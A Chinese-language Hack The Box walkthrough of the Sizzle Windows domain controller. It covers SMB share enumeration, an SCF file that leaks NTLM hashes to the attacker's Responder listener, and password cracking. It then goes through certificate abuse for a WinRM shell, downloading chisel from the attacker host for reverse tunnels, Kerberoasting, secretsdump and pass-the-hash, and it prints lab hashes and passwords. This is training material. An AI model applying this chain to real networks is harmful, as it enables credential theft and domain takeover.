基本信息

端口扫描

windows服务器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
$ nmap -sC -sV 10.10.10.103
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-10 13:23 CST
Nmap scan report for 10.10.10.103
Host is up (0.073s latency).
Not shown: 987 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2020-12-09T15:23:10
|_Not valid after:  2021-12-09T15:23:10
|_ssl-date: 2020-12-10T05:27:01+00:00; 0s from scanner time.
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2020-12-10T05:27:00+00:00; 0s from scanner time.
| tls-alpn:
|   h2
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2020-12-09T15:23:10
|_Not valid after:  2021-12-09T15:23:10
|_ssl-date: 2020-12-10T05:27:01+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2020-12-09T15:23:10
|_Not valid after:  2021-12-09T15:23:10
|_ssl-date: 2020-12-10T05:27:01+00:00; 0s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2020-12-09T15:23:10
|_Not valid after:  2021-12-09T15:23:10
|_ssl-date: 2020-12-10T05:27:01+00:00; 0s from scanner time.
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-12-10T05:26:21
|_  start_date: 2020-12-09T07:32:52

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.49 seconds

21

FTP可以匿名登录,但没东西:

80

一张gif:

445

smb发现一些信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
➜  ~ smbclient -N -L //10.10.10.103

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	CertEnroll      Disk      Active Directory Certificate Services share
	Department Shares Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Operations      Disk
	SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available

Department Shares

smb只有department可以访问,挂载方便查看内容:

1
mount -t cifs -o rw,username=guest,password= '//10.10.10.103/Department Shares' /mnt

ZZ_ARCHIVE

很多都是空目录,只有ZZ_ARCHIVE里有东西,自动化脚本检查:

Public

Public也是可写的,并且存在自动清理机制,写进去的文件会每4分钟被清除一次

writeable.sh

1
2
3
4
5
6
7
8
9
10
#!/bin/bash
list=$(find /mnt -type d)
for d in $list
do
	touch $d/x 2>/dev/null
	if [ $? -eq 0 ]
	then
		echo $d " is writable"
	fi
done

SCF Attack

参考资料:

就是写进去一个scf文件,自动清理机制是其他用户进行的,当进入目录浏览共享会自动执行,从而使得我们得到该用户的hash

把scf文件写进去,开启responder监听,等几分钟得到hash

1
2
3
cp miao.scf /mnt/Users/Public

sudo responder -I tun0

john

然后可以破解出来密码:

1
2
3
4
5
6
7
8
9
➜  Sizzle sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972       (amanda)
1g 0:00:00:59 DONE (2020-12-03 02:50) 0.01694g/s 193435p/s 193435c/s 193435C/s Ashiah08..Arsenic
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

但这个密码不能直接远程登录,应该是别的地方用到的

miao.scf

1
2
3
4
[Shell]
Command=2

IconFile=\\10.10.14.5\icon

目录扫描

443端口也开着的,使用IIS相关字典扫描得到结果:

1
2
3
4
5
6
7
➜  Sizzle gobuster dir -k -u https://10.10.10.103 -w /usr/share/seclists/Discovery/Web-Content/IIS.fuzz.txt -t 50

//certsrv/ (Status: 401)
//aspnet_client/ (Status: 403)
//certenroll/ (Status: 403)
//certsrv/mscep_admin (Status: 401)
//certsrv/mscep/mscep.dll (Status: 401)

可以使用前面的账号密码登录进去:

这是Active Directory证书服务中证书注册Web服务

certsrv

之后就是利用证书管理功能,生成可用于身份验证为amanda的证书:

1
openssl req -new -newkey rsa:2048 -nodes -keyout miao.key -out miao.csr

然后网页上Request a certificate -> advanced certificate request, 把自己生成的csr内容粘贴进去,模板xuanzeuser,Submit:

然后下载证书,要base64编码的:

winrm

然后用证书通过winrm连接,getshell:

winrm_shell.rb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
require 'winrm'

# Author: Alamot

conn = WinRM::Connection.new(
  endpoint: 'https://10.10.10.103:5986/wsman',
  transport: :ssl,
  client_cert: 'certnew.cer',
  client_key: 'miao.key',
  key_pass: '123456',
  :no_ssl_peer_verification => true
)

command=""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
        print(output.output.chomp)
        command = gets
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end
    puts "Exiting with code #{output.exitcode}"
end

amanda –> mrlky

这一步就是Kerberoasting,88端口在本地的,可以转发出去方便操作,拿到mrlky用户hash,破解密码,之后同样的方式给mrlky生成证书,winrm连接,得到user.txt:

1
2
3
4
5
6
7
8
9
10
11
12
# iwr -uri http://10.10.14.15:3000/chisel.exe -outfile c.exe
# powershell命令限制

wget http://10.10.14.15:3000/chisel.exe -OutFile chisel.exe

# target
./chisel.exe client 10.10.14.15:8008 R:88:127.0.0.1:88 R:389:localhost:389

# local
chisel server -p 8008 --reverse

python3 GetUserSPNs.py -request -dc-ip 127.0.0.1 htb.local/amanda

mrlky –> administrator

和后面一样,mrlky用户身份进行secretdump,拿到Administrator用户hash,然后PTH getshell

非预期?

file.txt

C:\Windows\system32里有个file.txt,里面是hash:

可以解出来密码: Football#7

secretdump

然后直接用解出来的密码dump其他用户hash:

1
python3 secretsdump.py 10.10.10.103/mrlky:Football#7@10.10.10.103
1
2
3
4
5
6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::

PTH

然后直接使用Administrator用户hash即可得到shell:

1
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267 Administrator@10.10.10.103

flags

1
2
type C:\Users\mrlky\Desktop\user.txt
type C:\Users\Administrator\Desktop\root.txt

参考资料